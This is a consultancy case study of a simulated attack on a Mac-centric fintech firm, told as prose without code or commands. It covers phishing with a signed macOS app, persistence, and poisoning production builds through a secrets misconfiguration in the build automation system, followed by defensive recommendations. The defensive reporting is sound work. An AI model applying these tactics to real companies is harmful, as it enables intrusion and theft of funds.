Case study

New tricks: simulating adversary tactics in modern, macOS environments

Darryl Meyer, Security Consultant
March 2020
23 mins read

In traditional corporate environments, where Windows desktop PCs, Windows servers, and private networks are used, Active Directory (AD) is often the driving force behind all the moving parts. The need for AD is lost, however, when businesses break away from what is considered a typical IT infrastructure. These modern companies favor Apple over Windows, deploying MacBook workstations and Linux servers across the network. With less red tape, they adopt new technologies at speed, and a lean workforce enables them to adapt to change with ease. Remote working is commonplace, and there is no dependency on legacy software.

Still, like their traditional counterparts, these organizations require solutions for infrastructure, communication, collaboration, identity and access management, device management, and so on. However, they manage them using alternative solutions, such as: 

  • A mobile device management solution (MDM) to remotely administer devices 
  • An identity and access management (IdAM) service to facilitate centralized access control to online services for communication, collaboration, and cloud infrastructure  

They often also adopt a default cloud-first strategy, removing the need for cloud migration to digitize their infrastructure.  
 

A change in tactics

In attacks against organizations that use Windows workstations and Active Directory, the compromise of a Domain Administrator (DA) account would sufficiently enable the final phase of the cyber kill chain – performing actions on objectives. Where AD is not used, a change in tactics is required. Although DA accounts may not exist in these alternative infrastructures, compromising administrator accounts for MDM, cloud, or IdAM solutions can prove just as lucrative.  

The consequences of such compromises include, but are in no way limited to: 

  • MDM: command execution achieved through pushing arbitrary executable code to all managed endpoints 
  • Cloud: attacker-granted direct access to servers hosting and processing sensitive information 
  • IdAM: access granted to online applications, thus providing access to sensitive resources or detailed information that reveals sensitive assets 


Engagement walkthrough

This walkthrough of a simulated adversarial attack is designed to help Mac-centric companies with alternative approaches to network management and general operations. It is also for organizations planning to move away from Windows architecture, thus seeking guidance on the opportunities and risks of this new venture, as well as the shift in mindset it demands. Either reader will gain an understanding of the techniques used by potential adversaries, their persistence, and what they are capable of.  

The scenario loosely replicates an F-Secure engagement with one such company, which, for the purposes of this article, we’ll refer to as TechOrg.  
 

Background

TechOrg is a fintech firm with over 200 employees, offices in multiple countries across the world, no Security Operations Centre (SOC), a cloud-first infrastructure, and MacBook workstations. Access to internally-hosted services, like a source code repository, DevOps, and backend support is facilitated over VPN. All other services, like email, chat, and collaboration, are provided by third parties like Google G Suite, Microsoft Office 365, Slack, and so on. Authentication to these services is performed through an IdAM and secured by hardware security keys. 

F-Secure was tasked with simulating a cyber attack against TechOrg. The purpose of this simulation was to demonstrate attack paths leading to the compromise of sensitive company assets, and to provide appropriate recommendations for the flaws and weaknesses identified on said paths. 
 

Simulation objectives: extract funds directly from both the organization and its users. 

Persistent attackers have clear goals. In this case, F-Secure's goal was to gain access to users’ data and use it in further attacks to steal their funds and funds from TechOrg itself. Although TechOrg has online business banking accounts, the attack team focused instead on the movement of money through its systems: from one user to another, from the organization to users, and vice versa. As such, the team selected a route that would position it within TechOrg’s live systems to modify payments in transit.  

The choice faced by the team was between positioning itself within the production environment on a server that had privileged network access, or embedding itself within the production applications themselves. Either option has advantages from an attacker’s perspective, however, the latter promised a privileged position with fewer triggers of suspicious activity – if the attack team could maintain a low-and-slow position. It would also enable them to withstand cloud infrastructure redeployments. 
 

Step 1: Perimeter breach

The engagement bypassed any open source intelligence-gathering stage of the kill chain, instead, assuming a position attempting perimeter breach. Although open source intelligence gathering may have provided unexpected insights and opened other avenues for attack, it would have required significant effort to be relevant and effective. Instead, members of the attack team worked closely with the client to simulate realistic threat actor techniques.  

A breach initiated through the compromise of services exposed on internet-facing infrastructure – such as web applications and VPN servers – was quickly ruled out. This is because TechOrg exposed very little internet-facing infrastructure, and it had secured what was exposed well. Phishing was chosen instead, using methods typically seen in attacks against financial companies. This combined a malicious payload delivered via email with credential phishing, in which social engineering is used to convince employees to reveal private credentials. 

Using employee credentials to attempt IdAM system access can be very lucrative depending on which are obtained. Compromising an administrator could allow for direct access to the target environment’s servers. However, administrators represent a relatively small attack surface, generally protected by heightened security controls. The privileges of other employees can instead be enough. Examples of this are a developer having excessive permissions within a sensitive infrastructure, or finance staff with unrestricted access to private financial information and applications. 

Traditional phishing payloads, like a Microsoft Word document containing macros that run malicious executables, are less likely to work against an organization that use Apple devices. Although Word and Excel are available for MacOS, modern versions of the software run in a sandbox. There is a possibility that the phishing target is running a version of the software un-sandboxed – perhaps even vulnerable to the previously identified sandbox breakout affecting older versions1 – but there is little guarantee. 

After assessing the options, the team arrived at a choice of two phishing payloads:

  • A signed and notarized MacOS application to get through Gatekeeper2 that would fetch and run the malicious code. 
  • An MDM configuration profile that would install a malicious browser extension into Google Chrome from the Chrome Web Store. 

The first of these options is more generic from an attacking perspective, and leaves open many further avenues of attack.  It is also possible, however, that employees may be more suspicious about installing an application. Furthermore, the application would be susceptible to any additional endpoint security controls. 

The second option aims to gain access to all authorized session tokens stored in the browser for an employee. This would allow the team to connect to whichever internet-facing services it was authenticated to, in anticipation that some would contain sensitive user information. This option relies on the installation process for a configuration profile being more conceivable than the installation of an application and the relative obscurity of a browser add-on. 
 

Step 2: Lateral movement

After consideration, option one was chosen: the signed and notarized executable application. The logic for this centred on its provision of remote code execution on a workstation, allowing the team to gather sensitive files from said workstation and pivot further into the environment. From this position, lateral movement – the next step of the kill chain – could proceed. 

The default security mechanisms on macOS won’t stop custom malware like the type F-Secure leveraged against TechOrg. They are intended to prevent the execution of known malware, whilst enabling users to decide what gets executed on their MacBook. If the pretext is sufficiently convincing, that is not a problem to the attacker. The pretext chosen was that the user had to install an application to apply an MDM configuration update that could not be done automatically by the administrators. Added legitimacy was achieved by providing installation instructions in an online document linked from the email, and making sure the email and document matched the company’s brand style. 

Persistence (maintaining foothold) on macOS is also possible without default security mechanisms raising any red flags. The chances of detection increase if a MacBook user has installed third-party software to monitor the known and commonly used persistence locations, like Launch Agents or Launch Daemons. Still, with a sufficiently convincing pretext, the user would not be suspicious of the application asking for permission to add a login Item or whatever the case may be. 

With remote code execution and persistence achieved, the attack team began its intelligence-gathering exercise on the infected MacBook, conducting internal reconnaissance. With lateral movement complicated by TechOrg’s cloud infrastructure – and no directory service – it was necessary to use information directly available on the compromised workstation and on the internal network. Additionally, with the absence of exploitable open services on other workstations, or remote administration services with shared administrator accounts, other techniques were needed to achieve lateral movement.  

It became necessary to exploit an internal system, preferably a dual-homed system so that they could pivot into another environment, or conduct a watering hole attack against other employees, until someone with higher privileges was compromised.   

TechOrg developed its proprietary software using DevOps processes, practices, and programs. Through its reconnaissance, the attack team identified the source code repository for the production applications, as well as a build automation system. The latter, it transpires, was continually tasked to build the production applications.  

Although it would be possible to push malicious code to the source code repository, the attack team quickly discovered that there were strong controls in place that would likely flag the malicious pull request. It instead concentrated on the build automation system, which was an enticing target for the following reasons: 

  • Build systems usually provide reach into sensitive environments inaccessible from the internal user network. 
  • Build systems store secrets, keys, and credentials to access, build, and deploy software, which could allow for: 
    • Read and (possibly) write access to private source code repositories 
    • System-level access to servers where the software is built. 
  • Backdooring software at build time can be carried out after the source code has been reviewed in the version control system, bypassing the above-mentioned strong controls. 

A secrets management misconfiguration was identified in the build automation system, enabling the team to assume the permissions of an administrative account. This account could alter build pipeline configurations, thus enabling the poisoning of any of the builds completed by the system. 

Step 3: Actions on objectives

It was agreed that the vulnerability adequately demonstrated the feasibility of backdooring TechOrg’s production code deployments without introducing any malicious code. By poisoning the production application at build time, strong controls placed on the source code repository and cloud environment could be bypassed, whilst still having the malicious code reach the production environment. With that reach, a real attacker would be able to interact directly with the application database to view sensitive user data and adjust account information. It would also have been possible to alter data passing through the system to modify payer or payee information. The implications of this reach signalled the team’s success in achieving the main simulation objectives. 

Recommendations

The following recommendations were provided to TechOrg to address the risks discussed above: 
 

Identify phishing attempts

Phishing attacks threaten all organizations, regardless of operating system. Minimizing the likelihood of a successful phishing attack is just as possible universally. 

  • Customize the appearance of tools such as G Suite or Office 365 to make it easier for staff to recognize when they are accessing the legitimate company instances and not a phishing clone of the website. 
  • Apply and configure the advanced email security features supported by the platform in use. Both G Suite and Office 365 offer these to help protect against phishing. 
  • Flag emails from external sources by creating an email subject rewrite rule if the email originates from outside the organization. 
  • Train staff to be aware of credential phishing techniques and the red flags when a trusted website is being proxied to do credential phishing. Staff should also know the process for reporting suspicious activity. 

 

Minimize the attack surface (most relevant to lateral movement) 
  • Multi-factor authentication should be enforced by default. Hardware security keys should be used as the first choice. Push notifications to a mobile device is an acceptable second option. 
  • A VPN should be used when accessing internal company resources (whether on-premises or in the cloud). 
  • Application whitelisting – though a huge undertaking – has significant positive implications and is a hurdle to master. 
  • Macs should be managed using an MDM with the configuration hardened to meet business requirements, whilst being as secure as possible. Some considerations when configuring an MDM for MacBooks are ensuring:
    • Device encryption is enforced 
    • A secure device password policy is applied 
    • Services not required by the company are disabled 
    • Installation of additional configuration profiles is disallowed after the configuration is complete 
  • Keep workstation software up-to-date, preferably automatically through the MDM. For software installed outside of the MDM, users should be alerted when software expires. 
  • Connections to the VPN originating from networks other than those trusted by the company, such as the office Wi-Fi, should require multi-factor authentication. 

DevOps
  • Source code repositories should be treated as high-value assets and secured as such. The most restrictive permissions should be applied on both read and write operations to the repository. Separate repositories for all projects will allow for easier application of a principle of least privilege to source code. Pull requests and commits should be reviewed and approved. Commits should be signed by developers. The purpose of these controls is to prevent unauthorized individuals from viewing source code and similarly prevent malicious code from being added to the repository.  
  • Build automation systems should be appropriately secured and strict access controls applied. The rights assigned to users who can administer the system and modify build pipelines and configurations should follow the principle of least privilege and be strictly controlled. Similar controls should be applied to accounts created or used for the build process itself, if applicable. Care should also be taken to eliminate the chance of sensitive data leaking through a secrets management misconfiguration or other information sources in the system. 
  • If the build process pulls assets and libraries from other sources under the organization’s control, the same strict security controls should be applied to those systems as well. If libraries are pulled from online sources such as Github or the npm registry, cached-known good versions should be used in production builds to help minimize the likelihood of a supply chain attack in which compromised libraries are included in the build. When a version change of the library is required, it should be appropriately assessed before being accepted. 
  • If the build tools and automation systems are hosted within a cloud environment, it should be properly secured by ensuring that the critical components, such as IdAM and data storage providers, are locked down and properly configured. The principle of least privilege should be applied to cloud infrastructure and can go a long way to mitigating the risk of lateral movement through cloud services. 
     
Detection and Response

Software development businesses should be able to detect security events across all endpoints, including workstations and servers. These events should be aggregated and sent to a security information and event management (SIEM) where rules can be created to identify security events worth investigating and for historical log retention. Once this has been established, their ability to detect realistic attacks should be assessed. 

  • Endpoint detection is recommended. EDR solutions exist for macOS and Linux. Their capabilities are increasing in the face of increased threats to organizations using non-Windows workstations or servers. 
  • Logs from workstations, servers, and cloud environments should be aggregated and stored to aid in detection and response processes. Cloud providers usually have monitoring services for hosted infrastructure that can be directed to a SIEM. As for macOS, it includes default log streaming capabilities, however, for greater insight, additional software is required to gather detection information and to perform ad hoc queries. 
  • Identify risks and risk scenarios within the CI/CD environment and add these to the monitoring capability of the SIEM.
     

Summary

The predict, prevent, detect, and respond (PPDR) framework still applies to modern tech organizations, and should form the foundation of their strategy. Tried and tested prevention strategies still apply to them.  

This includes taking measures to ensure the software those organizations create and deploy has been assessed for vulnerabilities. All systems along the path of application creation – from development workstations, to build automation systems and production deployment environments – should be assessed. A single weak link may be all that is required to compromise critical assets.  

While prevention is important, its limitations ought to be acknowledged, with detection and response capabilities being introduced and monitored as well. Where alerts were typically focused on the environment, these should now be extended to alert of higher risk DevOps vulnerabilities. 

In non-traditional environments like these, the target shifts from user workstations to code in CI/CD pipelines or the cloud server infrastructure. CI/CD pipelines and systems need to be secured and considered instrumental to an organization’s critical assets and thus critical themselves. Cloud infrastructure security is often an afterthought, to some extent secure by default, and the service provider’s responsibility. However, a compromise of either could have disastrous consequences. A compromise of the build environment can result in a production compromise, as in the case of TechOrg, which may lead to unrecoverable losses. 

Simulated activity often does not conclude with radical shifts in mindset or bombshell moments. Instead, continuous testing and improvement across offensive, defensive, and collaborative activities offer gradual but visibly incremental improvement. For TechOrg, the F-Secure attack team highlighted shortcomings in its existing controls that could (if exploited) have had a major effect, and also provided the organization with realistic recommendations for remediation. 

 

Sign up for the latest insights

Speak to a Consultant

To find out more, please fill out our contact form and a member of the team will contact you.

Accreditations & Certificates

F-Secure Consulting (F-Secure Cyber Security (Pty) Ltd) is a level 4 contributor to B-BBEE with a procurement recognition level of 100%. Learn more and download our B-BBEE certificate. Click here to read the press release.

Follow us
@fsecure_consult F-Secure-Consulting fsecurelabs